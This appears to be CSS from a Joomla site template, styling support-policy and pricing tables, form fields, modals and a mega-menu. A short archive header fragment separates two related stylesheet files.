.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #ff8800;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #ff8800;
  border-color: #ff8800;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.sr-only,
.visually-hidden,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}
.btn-close {
  background: #f0f0f0;
  border: 0;
  border-radius: 50%;
  color: #999;
  height: 32px;
  text-align: center;
  width: 32px;
  margin-left: auto;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
}
.btn-close::before {
  content: "\f00d";
  display: block;
  font-family: FontAwesome3 !important;
  font-size: 16px;
}
.btn-close:hover {
  cursor: pointer;
  color: #666;
}
.field-calendar .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.field-calendar .input-group .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.field-calendar a:hover,
.field-calendar a:focus,
.field-calendar a:active {
  cursor: pointer;
}
joomla-field-custom.field-custom-wrapper .input-group {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn {
  border-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select {
  background-color: #2f7d32;
  border-color: #2f7d32;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:active {
  background-color: #296e2c;
  border-color: #296e2c;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear {
  background-color: #c52827;
  border: 1px solid #c52827;
  border-top-right-radius: 5px;
  border-bottom-right-radius: 5px;
  color: #fff;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:active {
  background-color: #ae2322;
  border-color: #c52827;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn span {
  line-height: 38px;
}
.input-group {
  position: relative;
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  width: 100%;
}
.input-group .form-control {
  width: auto;
}
.input-group .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.com-tags-tag.tag-category .filters {
  display: flex;
  align-items: center;
}
.users-profile-custom-joomlatoken .dl-horizontal dd {
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 400px;
}
.com-finder .form-inline > label {
  margin-bottom: 10px;
}
.com-finder .input-group {
  display: flex;
  align-items: center;
}
.com-finder .input-group .btn:last-of-type {
  border-radius: 5px;
  margin-left: 10px;
}
.j40 joomla-field-media .input-group {
  max-width: 356px;
}
.j40 joomla-field-media .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.j40 joomla-field-media .input-group .form-control {
  border-top-left-radius: 0;
  flex: 1;
}
.j40 joomla-field-media .input-group .btn {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.j40 joomla-field-media .input-group .icon-times::before {
  content: "\f00d";
  display: inline-block;
  font-weight: FontAwesome;
  font-size: 16px;
}
.j40 .form-control-feedback {
  font-size: 12px;
  font-weight: 400;
  top: auto;
  bottom: -28px;
  line-height: 1;
  width: auto;
  white-space: nowrap;
}
.j40 .com-newsfeeds-newsfeed__items {
  margin: 0;
  padding: 0;
  list-style: none;
}
.j40 .com-newsfeeds-newsfeed__items li {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.j40 .com-newsfeeds-newsfeed__items .feed-link {
  margin-bottom: 20px;
}
.j40 figure {
  margin-bottom: 20px;
}
.j40 figure img {
  max-width: 100%;
}
.j40 #com-contact-form {
  margin-bottom: 20px;
}
.j40 .request-confirm fieldset legend {
  font-size: 16px;
  padding-bottom: 20px;
}
.j40 .article-aside .icons {
  float: right;
}
.j40 .article-aside .icons a {
  display: block;
  position: relative;
}
.j40 .article-aside .icons [role="tooltip"] {
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 3px;
  color: #fff;
  display: none;
  padding: 2px 4px;
  position: absolute;
  white-space: nowrap;
  right: 0;
  max-width: none;
}
.j40 .article-aside .icons:hover [role="tooltip"] {
  display: block;
}
.j40 .password-group .input-group {
  display: flex;
  flex-wrap: nowrap;
}
.j40 .password-group .input-group input {
  width: auto;
}
.j40 .edit.item-page .choices__inner {
  padding-right: 6px;
}
.j40 .edit.item-page .choices__inner button {
  background-color: rgba(255, 255, 255, 0.3);
  border-radius: 8px;
  border: 0;
  margin-left: 6px;
  padding: 1px 6px;
}
.j40 .edit.item-page .choices__inner button:hover,
.j40 .edit.item-page .choices__inner button:focus,
.j40 .edit.item-page .choices__inner button:active {
  background-color: rgba(255, 255, 255, 0.5);
  cursor: pointer;
}
.profile-edit .password-group .input-group input {
  min-width: 268px;
}
.profile-edit .control-group {
  margin-top: 20px;
}
.profile-edit .control-group .controls {
  float: none;
}
.j40 .joomla-modal.show,
.j42 .joomla-modal.show {
  background-color: rgba(0, 0, 0, 0.5);
  opacity: 1;
}
.j40 .joomla-modal.show .modal-dialog,
.j42 .joomla-modal.show .modal-dialog {
  top: 50%;
  transform: translateY(-50%);
}
.j40 .joomla-modal.show .modal-dialog .modal-content,
.j42 .joomla-modal.show .modal-dialog .modal-content {
  border-radius: 5px;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
}
.j40 .jviewport-width80,
.j42 .jviewport-width80 {
  width: 80vw;
}
.j40 .jviewport-height70,
.j42 .jviewport-height70 {
  height: 70vh;
}
.j40 .modal-header,
.j42 .modal-header {
  align-items: center;
  border-bottom: 1px solid #ddd;
  display: flex;
  padding: 12px 16px;
  justify-content: space-between;
}
.j40 .modal-header h3,
.j42 .modal-header h3 {
  font-size: 24px;
  font-weight: 500;
}
.j40 .modal-body,
.j42 .modal-body {
  overflow: hidden;
  padding: 0;
}
.j40 .iframe,
.j42 .iframe {
  border: 0;
  height: 100%;
  width: 100%;
}
.j40 [role=tooltip]:not(.show),
.j42 [role=tooltip]:not(.show) {
  right: 5em;
  z-index: 1070;
  display: none;
  max-width: 100%;
  padding: .5em;
  margin: .5em;
  color: #000;
  text-align: start;
  background: #fff;
  border: 1px solid #6d757e;
  border-radius: .25rem;
}
.j40 .container-popup [id="filter[search]-desc"],
.j42 .container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}
.j40 .btn-toolbar,
.j40 .js-stools-container-filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-end;
  align-items: center;
}
.j40 .ordering-select {
  display: flex;
  align-items: center;
}
.j40 .btn-group {
  margin-right: 10px;
}
.j40 .js-stools-container-filters {
  display: none;
  margin-top: 20px;
}
.j40 .js-stools-container-filters.js-stools-container-filters-visible {
  display: flex;
}
.j40 .js-stools-container-filters .js-stools-field-filter {
  margin-right: 10px;
}
.j40 .js-stools-container-filters .js-stools-field-filter:last-child {
  margin-right: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner {
  border: 0;
  min-height: auto;
  padding: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner input {
  margin-bottom: 0;
}
.j40 #contact-form label.required {
  position: relative;
}
.j40 #contact-form label.required .form-control-feedback {
  background: #fff;
  border-radius: .5rem;
  box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
  border: 1px solid #e5e7eb;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0 .5rem;
  right: auto;
  left: calc(132%);
  bottom: calc(132%);
}
.contentpane .subhead {
  border-bottom: 1px solid #ddd;
  padding-bottom: 12px;
}
.contentpane .subhead .btn-toolbar {
  display: flex;
  gap: 10px;
  margin: 0;
}
.contentpane .subhead .btn-toolbar::before,
.contentpane .subhead .btn-toolbar::after {
  display: none;
}
.contentpane .media-sidebar {
  border-right: 1px solid #ddd;
}
.contentpane .media-toolbar {
  border-bottom: 1px solid #ddd;
  margin-right: 20px;
  padding-left: 20px;
}
.contentpane .media-toolbar .media-toolbar-icon {
  border-left: 1px solid #ddd;
}
.contentpane .media-toolbar .icon-search-minus,
.contentpane .media-toolbar .icon-search-plus {
  font-family: FontAwesome3;
}
.contentpane .media-toolbar .icon-search-minus::before,
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f010";
  display: block;
  font-size: 16px;
}
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f00e";
}
.com_contact fieldset.filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}
.com_contact .com-contact-featured__filter {
  display: flex;
  flex-wrap: wrap;
}
.com_contact .display-limit {
  margin: 0;
}
.com_contact table.category {
  margin-top: 2rem;
}PKӜ�\�/p7p7)purity_iii/css/themes/orange/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    display: table;
    content: " ";
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -20px;
  margin-right: -20px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
